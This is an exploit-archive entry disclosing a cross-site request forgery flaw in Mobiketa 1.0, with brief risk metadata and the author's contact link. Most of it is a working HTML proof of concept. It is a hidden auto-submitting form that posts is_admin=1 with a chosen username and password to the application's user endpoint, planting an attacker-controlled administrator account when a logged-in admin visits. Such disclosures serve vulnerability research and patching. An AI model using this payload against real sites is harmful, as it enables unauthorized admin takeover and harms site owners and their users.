Mobiketa 1.0 Cross Site Request Forgery

2016.06.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0
# Exploit:
< -- bug code started -- >
-->
<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<!--
< -- end of the bug code -- >
#########################
[+] Contact: http://twitter.com/muratyilmazlarr
-->

